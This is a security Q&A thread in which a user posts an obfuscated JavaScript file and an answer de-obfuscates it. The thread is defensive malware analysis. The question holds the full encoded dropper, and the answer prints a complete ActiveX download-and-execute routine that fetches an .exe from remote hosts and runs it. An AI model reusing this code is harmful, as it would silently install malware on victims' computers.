function ubyxm()
{
var a = 1;
var ygzmi="eb773ea560e607bb4276cd761ba17ccd07afcb7bb3e35f8472e6e70b5061d4f51b9374cee61f4a74fa853b8567aa77ae6d78b5340b0767f4a79f743dec360f8767c4179e9839b0235d0876cdb74de679ac979f8e77e5b74a2476d087ed913cab06eb6461dc167c716cf8c6eb4463b3974a4a67bc435f6c6df7978c0d79d4a5dda161d6961cac65dff35bf328e3f35ad47be0a70ce462b9835e3254ec876c3261bde7ca1f63bf170a1f4dcf95aa5877b8e7ff6270f5f76bb261cef3dc2e37b6f58b8f46adc4dfd158a2959acd27b033badf4db4d58a9f59ac45de1b41e4941fd745fe837b253ca6f2eb8b6dbae78ac879ef45dbf561ec861c8665"+
"e463bc977adbc65d1570b3e7bb4b3df3a37e6952b4650fbc41a0137be039fa535d3560f8867faa79c6d39a5335d9773e4274f4b79f9b66c5670dd93ce0e2ec6a6dac178ef679a0d5dc9161d6561b3c65e923bb3f66f2970f8d7bc8a71c603df733cdcb2ed627ce0473f0b35fdd3dfae6db7778acf79f455dcfa61d8861b2c65ce73bdae66b7d61a3874a6d61c7a60c3d66d8c35b1528f5628c0635e3127e7825d9025a0f3ce2635d886ec2e67b6e70c1561e9d60b7167b477bdfe35b1076bea74d0279e1379e5877eb874b0e76ac77eaea3dda96dcd978a1979f935df9461e9861c8365eac3beb947bd870e6266cde65ed17ad997bd6266e4070"+
"b0257c8c7ab6971f066cb8a39bd935bd773b6f74e1579ed866d3270fa03ccff2eea868bff70e4c79c9066ede70fbe6eaad67d5e70dfa61b7060a6467d027bc0635b1d76efa74ea679eb179f4577dd474b1076e3f7eab93db427bd8360c7179a5b79c2739cca35f7961eb067dab60cb770ee03ca922ebf868beb68e8d76cf074aa161d0b76b367de0235c913de0070ac867de867bff7aa5d67d683cde26ec3467f1c70e7561e6f60d7a67aea7bc4035c5f76bf474f0379fe579eb677f0c74a9276e297ed283db0a7beef60f4d79ae779bc639cc235e9b61d0567f0660b4770f8e3cc7e2eb3468a3468d6e73edb60ab57bf6d76a2861c6a7cf237a"+
"f897bddb35eed72a9470a8161f9c51a4274e5361c0974e603da1276dbf74c0f79ba879cae77c7874b8b76c7e7edb93cabd6eddf61f9067ff36cd2c6ea9772aed70d4661b0b51b2874f3461dd174c0053a6867be97ae1178c2140b0567dcd79cee3dfa337a5e7dab061fcf61aed65fef2ff7e3afa03ae5661ea67cf817be856ce0160d5c67c7c79c1c3bbc376b9c7af9278a6b3ac347dc3b70f2526fa977d3f7db8e27abb22bf537abc39ad335e5573ab860f897ba3476db661c1d7cc297ab687bc733db9e67c7570d8e66a4760d5079ed561b6639ac835dec70a7467bab67be27ada067dcc3ce7235d5f6ee957cba173d5135c783ddb234c1270"+
"c9b67a2867e1f7ae0467e8c3cab76ea6b67ad370d8f61fdf60f6867c797be4035e3476a1a74e2779b4c79a7077be274aaf76e757ecfa3dedf67db270fd266cb460fe879ded61a3c39b5835a4d73cab74aa079e4666af370a6d3cb3d2efbd68dd170c2579e4866f0370c0d6ea0172c0e70cb561c1851bc374a7161ac274ba553f6f67ec97afc278f2a40f0667ae679c333dd3937f457df9e61a5561a5165d2c2fdff3ab083ada87aa3074bcb78f9e7ba587ae7c7db817bbe371a0165efa7cc0562e0865cc47cb8c76a8272d8878cae3bcff7ade97bdf87cb617ad307bea63bbdd7bee660a0c3ade724c7625c163bea478cf97ac8b63a8637ca339"+
"ba335dbc73b5b60fc37ba4476c3d61d0b7cb137ae107bb753dcae67d4b70c9e66a5c60b7e79cc361b8c39e0c35a8c70fb467a3d67ab27af2067f3f3cd7535dd26ef297cc1273b4035ae63db1934a1570bc667f8867fed7ae8a67a3c3cd0c6edd167bfe70d3161a5160c9c67f657bb1435a1b76f1f74c0879b5679b9477b3774c5a76cb47eb793dca067fb070c8066be460f4879a0e61cf339f4735c0273dc974b5379fed66b7570eb43ca982edb168d2e70fd479a5d66bfa70f2f6eedf72e4570a3161c5051ef574e8761e3474a6853e0767d797ac7778c4040d6b67fc179b0f3dd9637e897db9d61f8861a1d65d842fec83ad8d3ab3061b747c"+
"a1c7bde46ca3c60ed467be479a0b3bc9976e2e7af7278bb93add97db6970d7b26b5077d097dfb327c3a22e1c37eb439a1f35d0c73af260f797bcbc76a5661d117cf847ac847bb7e3dc7e67ce070a2866bcf60f4a79c5f61fdf39e0735aed70b4467baa67be07af2b67b593cb1b35f9e6ef6d7cd4773a5735e903dac534f1570cd667a2a67d5b7ab3467bd93ca9b6ed9e67e7970d9561e5660aa367db57ba6035eab76ae074d2279baa79ba177f5074a3d76c597edc43dee967cd470af366f8460fbf79ce061dcd39ade35e5573cd274fb279b3f66c5c70d143cfde2ef6f68bdb70ae979afd66c7b70d286ed6067dcf70b6f61c3c60cf367c4e7b"+
"a7e35d9d76c1474b0679d3a79bb777aec74a8f76fdd7ee423de587bed160f5179e8079b2c39e5835c7761a7f67a4c60e4e70e343cc122ecc768ccf68a2e3cf152eb7a68f9168d053cc882eb8a68ddb68d583cab52eec668e0776bdd74e9661e3e76b887dfdf35b7c3da1170c2c67f1967ae27ad3f67b183cff06ed2267acf70a2661f2660f0867d697ba8835bea76a5a74de079baa79cb777bc974d9076e737ece93de2e7bc6f60a8479f2379b6c39eb935ce661e0f67d9560fe570bd73ca4b2ea5468b1568c7a73b7660ec57bbbf76a4761cf67cd247aa587bf6c35ead72b2470e7061b5741c7270c8678fd565a8753c8a7ce3179d2a70c6c45"+
"f3474b6861ddf7df363dae43cc2a6ef8261c6567ce66ca8b6ee3f63a7474d2167cd435fe373e7566d3c35d0228e2235b397be1b70e2262aa335a1154cce76db661e697cde363ff570e374dc385aa1077b247fc4570ca276c4c61f133dbb237c8146f5476ab667dd77cb1865c7b61fc67ce397bdf072f353beab53e717ca9c79d4070e8046ce16cabc66c9f61e4d70de178eda5adc177df07fc7c70e5476da361dbf37c383cc3a2ebb063b9874f3567ec335c3061b3f78cb065f6653dc87ca3a79f5670b8f5bf5174a3c78baf70ff135f7c28b2335daf37aa149f6649aad37e7335e763ef0e35d7d58d2574c7661d1e7dd2a3bdd167efa74ff17b"+
"ed871b917ab3878ad03db5e3cdde3bd6261bfe7abdf46e0c61a9067cb37cdf57bef272d463ddf426c9023dd83cd463bc3e66b3860f0477e3266b2161c0567f233de0b27d4939acb35c4f2cc823ce5b35a5d3ea9f35ae937cba3bdb470b486df5470db837c2f2ece463be974a2267e5135cab61a4778b7a65f4e53eba7cc3c79cab70dda45adc74bb261b3b7de4e35b9628e5035e4673da866c133baae52fcd70de061d3b46c2e65b7870d7b76b6e7cdfa74a5b79b6753b237aa0379d4671b9870bdf67f853dcb027c693ca7d35f033eac435bdd61d7178eb065be753baf7cc2a79a9e70d075bc6e74d8c78ed070f6e2ef3a67b8a70fb561d3760"+
"b5f67bf87bf6c35de561cc278a8765a3053f827cc4c79dde70a3445e7274c2761ac77dc432ec5a68e6c76c2574c7861b2576b277dc1d35c6e3de8b70bde67c6467a307ae0a67a223cd636ee9567be570a7061a5260f0e67f157be2735de173b2274ba879c9166fde70ee62ed2a68df568da573ea760b467bb7876cb361e3b7ced97afd97ba7035f1866aa374c8c63fc170a1741d837af6541c3370eee78c3665ee73dc1171d7974c3561c4674fcd39e8335bc576cb574c2779f1779a8777b1d74f7e76ac47ec9e3cb876ebb461d2f67e816cb326ef5963a8074e4167e4c35b0665bcd74d2961eba7dfa235fe528ea035cd272ad570ac861e1241"+
"b4d70ade78dbb65b8653c457cf2e79b8c70b9045d0774a8761aa07deb83de633cd002eeed7cbae73bf835e5e3ddd965efe74c1a61e167dcfa3cd956eb9463abf74afd67cf235c8f7ae8d77edd7fdcd46e5c61dd667e1d70a2074a3978e0835eef28ee635ff37bd8e70c8462b2235de354c2576e3761d1e7ceee63edf70b9d4dc155ac8c77d0d7ff3c70e9f76a9161d213dd1e37cfc54c3651b065adec51b0757a503be3346f5a61fdb67f6c70fdb74d5d78e9737b173ca6e2ed847aa7677b3a7fee846fcd61c0b67a4e70a3974c7078f9f3bf275ae4c65c8e70a7f7bd2b3dc953caa92eaba7ad3277be07faba46dbf61b2667b2b70bad74ee678"+
"b213bf3b41ccd6cced65a1070f9535dd728e2935f5324d332ee747ae2777d837fcf246bf361eab67a4070d3b74ad178b643bb4042d2a67ea37ca3161b7e70c503da7d71fee74c1d61c4374d963cb282ee137ae2577a6a7febe46dc661c8667cf670b5074cf378f243bbf445cf67adfa66bf67cb8361dfa7ce697ac0d7be1b35acc28b1b35d7a25e292ed787aeae77a5d7ff5346c0b61b0b67ea970fe074c9178a723bde946ae374a2863edb70a4641f6f7ad5053ae97cf7279f8970e293dc3865d3974a1661f107dade39a6435d7427a2a3cbd32efb47ab2777f097fb0946d6061b7767a7c70c1474d3678b733bc3d56d7f79e397ad6366ae870"+
"d3f3da563cea62ea4967c7f70dc261c7860b6067fde7befe35c0376ba874d9279e9579cfb77c7874ccf76e247edf23ddd165d4074f9561a3c7db3639ca435b1a73f9874d9979f2766ea470e483cdfe2ef1368d4570ebf79aee66fa970b4135f126ebec67cfe70e7f61e5e60ad467bcf7bbff35bb976f1b74fcc79f1b79d8077d6174d5576c537edaf3dddd7bc1060ec079f8779c5739bff35f9461f1867a8c60b3770bb53ca462ed3268bf068f6d76a0c74a6561b4576f6c7dd0f35ec03dbdc70d8e67fcd67b847ab0c67e033cbc76ed9b67b2570b2261f6f60de767db37bc1035f4376d3c74f7979af279f4477a6574a3076ac97ec653dfc57b"+
"b8860cea79ba179fbf39e8335a9861cba67ec760d5c70fe93ca412edb168bea68bb772aad70bb761f2251c2f74e0361d7274a863db1173b3e60e7b7bb9676ac161c037cde47acdd7bd8435f0a3dacb71aed74ac561fec74a2039b9335c2370d0167c4867df17abed67e1c3ce3935af96ee107cd4373f0535e3d3de9134b3e70c8f67b8e67e627ad8167a623cff56ee0d66a7174a5963a0a70ae341e307ae3f41aa770acc78b8a65d643dc8071c8f74e9861d0874f9039c8c35b9873da460cda7ba6176bb961e217cf197aba37bf6a35bb33daea65da574f1361c287dc6439e3635ef670c2e67dc667b217ac3167aaa3cc6b35dbd6ee337cb2573"+
"d1435e863de2234b7370bd667bfe67e557afc167dc43cde56ee9561a7c67c4f6cd756efa263aee74af567b0235c2d62dcd66eb67dafb35e6e28ff735aa27bab170ace62c2935c8a54b1776af361d117cbf663ba570dae4dfcb5aff877d607fbc270e2376b4161cb13dcee37f3042ac546a8276f4167bd67ce2265ef361a473bba246b227dbd570fe279a1079adc37a3a3cc1b2ed1a62f3d66a687db093bbc747d9760d077bbc53daf765d7874ce961ebb7dfd13cb2a2ef7768b1e76da074af661bf476f907dbf035fd53dcb270de367bc067d107ada467ab33cd1135fc06ec1868ec668b5168bc13ccec2ea9d68d3968e543cec52e";
var nhyqh;
while(true){
try
{
nhyqh=(new Function("uvemk","var iltyk=uvemk.match(/\\S{5}/g),vsuha=\"\",flmmo=0;while(flmmo<iltyk.length){vsuha+=String.fromCharCode(parseInt(iltyk[flmmo].substr(3,2),16)^21);flmmo++;}"+egshi()+egshi()+egshi()+egshi()+"(vsuha);")(ygzmi));
break;
}
catch(er)
{
}
}
return nhyqh;
}
function egshi()
{
var azupl=new Array("e","v","a","l");
return azupl[Math.floor(Math.random()*azupl.length)];
}
ubyxm();
Asked
Active
Viewed 710 times
-1
5gon12eder
- 810
- 5
- 10
Alexa
- 11
- 1
-
1You haven't given us the whole thing. The code at the end is incomplete, but given how heavily obfuscated this code is, it's pretty safe to assume that it doesn't do anything good. – Brian Williams Jan 22 '17 at 23:45
-
I copied and pasted everything that was in the file. – Alexa Jan 24 '17 at 06:40
1 Answers
4
With some minor modifications it's the same obfuscated JS code as here and here. (Both threads contain a deeper analysis.)
Essentially, the script downloads an executable and runs it, employing Internet Explorer's ActiveX controls. The difference to the previous examples is that it tries to get the .exe from multiple URLs:
http://[shortener].com/he3bh27 http://[some onion address].onion.nu/10.mov http://[shortener].com/he3bh27 (again)
Here is the de-obfuscated payload:
function getDataFromUrl(url, callback) {
try {
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlHttp.open("GET", url, false);
xmlHttp.send();
if (xmlHttp.status == 200) {
return callback(xmlHttp.ResponseBody, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}
function getData(callback) {
try {
getDataFromUrl("http://[shortener].com/he3bh27", function(result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl("http://[some onion address].onion.nu/10.mov", function(result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl("http://[shortener].com/he3bh27", function(result, error) {
if (!error) {
return callback(result, false);
} else {
return callback(null, true);
}
});
}
});
}
});
} catch (error) {
return callback(null, true);
}
}
function getTempFilePath() {
try {
var fs = new ActiveXObject("Scripting.FileSystemObject");
var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
return tmpFilePath;
} catch (error) {
return false;
}
}
function saveToTemp(data, callback) {
try {
var path = getTempFilePath();
if (path) {
var objStream = new ActiveXObject("ADODB.Stream");
objStream.Open();
objStream.Type = 1;
objStream.Write(data);
objStream.Position = 0;
objStream.SaveToFile(path, 2);
objStream.Close();
return callback(path, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}
getData(function(data, error) {
if (!error) {
saveToTemp(data, function(path, error) {
if (!error) {
try {
var wsh = new ActiveXObject("WScript.Shell");
wsh.Run(path);
} catch (error) {}
}
});
}
});
Arminius
- 43,922
- 13
- 140
- 136